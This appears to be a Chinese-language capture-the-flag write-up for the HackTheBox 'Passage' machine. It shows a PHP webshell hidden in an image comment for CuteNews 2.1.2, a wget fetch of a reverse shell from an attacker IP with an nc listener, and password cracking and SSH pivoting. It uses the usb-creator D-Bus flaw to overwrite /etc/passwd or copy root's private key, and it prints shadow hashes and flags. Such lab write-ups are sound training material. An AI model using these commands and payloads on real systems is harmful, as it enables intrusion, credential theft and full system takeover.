0%

HackTheBox-Passage

Name:Passage
OS:Linux
Diff:Meduim

0x01 Enumeration

Nmap Scan

22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))

http-80

右键页面源代码发现,还有另外一层路径。

1
<script src="CuteNews/libs/js/jquery.js"></script>

接着继续访问http://passage.htb/CuteNews/,一个管理页面, 从下方Power by信息可以得知版本为2.1.2 CMS是CuteNews。

1
2
3
4
5
6
7
searchsploit CuteNews


CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py

阅读漏洞说明可知,版本存在上传文件绕过,只需上传后缀为php的图片马文件。

1
exiftool -Comment='<?php echo "<pre>";system($_GET['cmd']); ?>' 65301509.jpg;

上传时后缀修改为php。

1
cmd?wget%20http://10.10.14.45:8000/php-reverse-shell.php

监听并访问shell。

0x02 Get Shell

1
2
3
4
5
6
7
8
9
$ nc -lvnp 1234
Connection from 10.129.2.25:47374
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
22:19:48 up 2:10, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
nadav tty7 :0 20:09 2:10m 5.17s 0.32s /sbin/upstart --user
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation(user)

1
2
3
4
5
6
7
8
9
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash

$ groups paul
paul : paul
$ groups nadav
nadav : nadav adm cdrom sudo dip plugdev lpadmin sambashare

使用linpeas.sh脚本进行了信息收集,但是没有什么发现。返回网站根目录进行收集,发现/var/www/html/CuteNews/cdata/users/文件夹下的文件有部分base64加密的内容,对其进行解密。

1
2
 echo 'YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19'|base64 -d
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"[email protected]";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}%

cmd5在线解密结果:atlanta1

1
2
3
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
paul-coles:atlanta1
paul:atlanta1

nadav的sha256加密密码也能在这里找到,但是无法解密。

1
2
3
4
5
6
7
8
9
10
11
12
python3 -c 'import pty;pty.spawn("/bin/bash")'

su paul
atlanta1

whoami
paul

id
uid=1001(paul) gid=1001(paul) groups=1001(paul)

user.txt:7fdc538629d64dd7a35dceba4d4d7098

paul用户不是特权用户,但是在其目录的.ssh下发现nadav用户能直接通过私钥认证登入paul用户,所以猜测paul用户应该也能通过私钥验证来登入到nadav用户。

1
2
3
4
[email protected]:~$ ssh [email protected]
Last login: Sat Jan 23 23:09:31 2021 from 127.0.0.1
[email protected]:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

0x03 Privilege Escalation(root)

在这里被卡住了很久,,最后在任务列表中发现root用户运行着这么一个任务。。,google发现其存在提权漏洞usb-creator Ubuntu Desktop利用

1
2
ps -ef |grep root
root 53246 1 0 23:23 ? 00:00:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

通过覆盖/etc/passwd来提升权限。

1
2
3
4
5
6
7
8
9
[email protected]:~$ cp /etc/passwd ./
[email protected]:~$ echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >>./passwd
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true
()
[email protected]:~$ su new
Password:
[email protected]:/home/nadav# whoami;hostname
root
passage

又或者通过获取root的id_rsa来提权。

1
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
1
2
3
4
5
[email protected]:/tmp$ ssh -i id_rsa [email protected]
Last login: Sat Jan 23 23:24:41 2021 from 127.0.0.1
[email protected]:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
passage
1
root.txt:b78635dda225dbe1bb6b72f7a19fc2f5

/etc/shadow

1
2
3
root:$6$mjc8Tvgr$L56bn5KQDtOyKRdXBTL4xcmT7FVWJbds.Fo0FVc11PWliaNu5ASAxKzaEddyaYGMxGQPUNo5UpxT/nawzS8TW0:18464:0:99999:7:::
nadav:$6$D30IVulR$vENayGqKX8L0RYB/wcf7ZMfFHyCedmEIu4zXw7bZcH3GBrCrBzHJ3Y/in96pthdcp5cU.0UTXobQLu7T0INzk1:18464:0:99999:7:::
paul:$6$cpGlwRS2$AhcQyxAskjvAQtS4vpO0VgNW0liHRbLSosZlrHpzL3XTfPHmeDL7hWkut1kCjgNnEHIdU9J019hQTAMH6nzxe1:18464:0:99999:7:::